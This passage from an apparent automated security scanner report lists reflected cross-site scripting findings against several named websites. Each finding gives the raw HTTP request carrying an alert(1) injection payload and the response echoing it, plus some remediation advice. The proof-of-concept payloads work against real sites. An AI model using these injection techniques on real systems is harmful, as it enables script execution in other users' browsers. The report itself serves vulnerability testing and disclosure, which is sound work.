
Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/homepage_video.html299e0'%3balert(1)//bca7c7ba913 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:38 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69743
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
y.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/video/homepage_video.html299e0';alert(1)//bca7c7ba913';
}
//-->
...[SNIP]...

1.189. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 2cb1d<script>alert(1)</script>45f4ec0d44a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=82cb1d<script>alert(1)</script>45f4ec0d44a&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:54 GMT
Date: Wed, 28 Sep 2011 02:52:54 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"82cb1d<script>alert(1)</script>45f4ec0d44a", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.190. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 79308<script>alert(1)</script>6e5cfd0a1c8 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=79308<script>alert(1)</script>6e5cfd0a1c8&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:53:01 GMT
Date: Wed, 28 Sep 2011 02:53:01 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"79308<script>alert(1)</script>6e5cfd0a1c8", c15:"", c16:"", r:""});



1.191. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 261ad<script>alert(1)</script>9c83b70164f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15=261ad<script>alert(1)</script>9c83b70164f HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:53:03 GMT
Date: Wed, 28 Sep 2011 02:53:03 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
-){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"261ad<script>alert(1)</script>9c83b70164f", c16:"", r:""});



1.192. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 128f0<script>alert(1)</script>073f8a07027 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693128f0<script>alert(1)</script>073f8a07027&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:56 GMT
Date: Wed, 28 Sep 2011 02:52:56 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693128f0<script>alert(1)</script>073f8a07027", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.193. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b0e7f<script>alert(1)</script>7e360bc2df2 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1b0e7f<script>alert(1)</script>7e360bc2df2&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:57 GMT
Date: Wed, 28 Sep 2011 02:52:57 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1b0e7f<script>alert(1)</script>7e360bc2df2", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.194. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d6c0e<script>alert(1)</script>c374874210e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2Fd6c0e<script>alert(1)</script>c374874210e&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:58 GMT
Date: Wed, 28 Sep 2011 02:52:58 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/d6c0e<script>alert(1)</script>c374874210e", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.195. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8eada<script>alert(1)</script>53915b59fa0 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=8eada<script>alert(1)</script>53915b59fa0&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:59 GMT
Date: Wed, 28 Sep 2011 02:52:59 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"8eada<script>alert(1)</script>53915b59fa0", c6:"", c10:"", c15:"", c16:"", r:""});



1.196. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 513c2<script>alert(1)</script>63f76fd61fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=513c2<script>alert(1)</script>63f76fd61fa&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:53:00 GMT
Date: Wed, 28 Sep 2011 02:53:00 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"513c2<script>alert(1)</script>63f76fd61fa", c10:"", c15:"", c16:"", r:""});



1.197. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcvipca02.rightnowtech.com
Path:   /Chat/chat/rightnow

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc was submitted in the REST URL parameter 3. This input was echoed as b3f1a<img src=a onerror=alert(1)>a456b84bccc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Chat/chat/rightnowb3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 472
Server: Jetty(6.1.25)

rntJSONpac_1({"error":{"chatSystemError":{"text":"Unknown or misconfigured site specified in '/rightnowb3f1a<img src=a onerror=alert(1)>a456b84bccc' AT Wed Aug 31 11:18:05 PDT 2011","chatMessageType":"ChatSystemError","type":{"value":"CANCEL","chatMessageType":"ChatErrorType"},"errorCondition":{"value":"SERVICE_UNAVAILABLE","chatMessageType":"Cha
...[SNIP]...

1.198. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcvipca02.rightnowtech.com
Path:   /Chat/chat/rightnow

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload da0b6<script>alert(1)</script>d4681e8f055 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Chat/chat/rightnow?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 121
Server: Jetty(6.1.25)

rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055({"queueId":61,"availableAgentSessions":8,"expectedWaitSeconds":0});

1.199. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callbackArgument parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcvipca02.rightnowtech.com
Path:   /Chat/chat/rightnow

Issue detail

The value of the callbackArgument request parameter is copied into the HTML document as plain text between tags. The payload ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19 was submitted in the callbackArgument parameter. This input was echoed as ae9d7<img src=a onerror=alert(1)>ceff7420d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Chat/chat/rightnow;jsessionid=1a724kt3h9vx819uympgg8zeuo?pool=3571:5&site_name=rightnow&responseType=JSON&callback=RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess&callbackArgument=0ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19&action=SEND_TEXT&msg=Hi-&offTheRecord=false HTTP/1.1
Host: bcvipca02.rightnowtech.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://crm.rightnow.com/app/chat/bdr_chat_landing/first_name/Hoyt%20LLC/last_name/Research/email/rtfm%40fastdial.net
Cookie: JSESSIONID=1a724kt3h9vx819uympgg8zeuo; BIGipServer=83893258.35125.0000

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 628
Server: Jetty(6.1.25)

RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess({"data":["0ae9d7<img src=a onerror=alert(1)>ceff7420d19"],"chatMessageType":"ChatMessage","responses":[{"sessionId":"1a724kt3h9vx819uympgg8zeuo","chatSystemError":{"text":"JSESSIONID not specified or invalid","chatMessageType":"ChatSystemError","type":{"va
...[SNIP]...

1.200. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ea276<script>alert(1)</script>2c8c12f6b22 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_52405312703ea276<script>alert(1)</script>2c8c12f6b22&pid=08d931ef-b202-210f-afa6-864a92315113&s=728x90&f=4.00&cid=Allmenus&url=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn2.allmenus.com.s3.amazonaws.com/v50/common/static/advertisements.html?server=www.allmenus.com&slot=am_50_header_leaderboard&ignore=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d8661604-aefb-4946-9a31-42430906ad5a; s=1492b9da-5863-4500-b6dd-490569492c7f; p=1313102815

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1313102976; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_52405312703ea276<script>alert(1)</script>2c8c12f6b22({"r":null});

1.201. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://brocade.netshelter.net
Path:   /fixed_placement.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f4f"%3balert(1)//73dd2287075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16f4f";alert(1)//73dd2287075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fixed_placement.js.php?publisher=info/16f4f"%3balert(1)//73dd2287075rmit HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Aug 2011 17:54:51 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.4
Content-Length: 42174
Connection: keep-alive

var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);

//Include NAP
window.blockNSPageTrack = true;
/* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with
* Array.prot
...[SNIP]...
orting as this
var NS_37_1_adSize="1x1";
// site name - any string - %s is the DART site variable - will be displayed in reporting as this
//var NS_37_1_adSite="%s";
var NS_37_1_adSite = "ns." + "info/16f4f";alert(1)//73dd2287075rmit";
// click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART
var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://a
...[SNIP]...

1.202. http://brocade.netshelter.net/fixed_placement.js.php [publisher parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://brocade.netshelter.net
Path:   /fixed_placement.js.php

Issue detail

The value of the publisher request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a983"%3balert(1)//1a28d2ffdbe was submitted in the publisher parameter. This input was echoed as 5a983";alert(1)//1a28d2ffdbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fixed_placement.js.php?publisher=informit5a983"%3balert(1)//1a28d2ffdbe HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Aug 2011 17:54:48 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.4
Content-Length: 42172
Connection: keep-alive

var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);

//Include NAP
window.blockNSPageTrack = true;
/* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with
* Array.prot
...[SNIP]...
ing as this
var NS_37_1_adSize="1x1";
// site name - any string - %s is the DART site variable - will be displayed in reporting as this
//var NS_37_1_adSite="%s";
var NS_37_1_adSite = "ns." + "informit5a983";alert(1)//1a28d2ffdbe";
// click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART
var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://adv.n
...[SNIP]...

1.203. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 1af17<script>alert(1)</script>33d62cd3122 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAGVItvU~,xxq25SD_mE9Rd7N-RZcmqKic844kbT39 HTTP/1.1
Host: c.brightcove.com
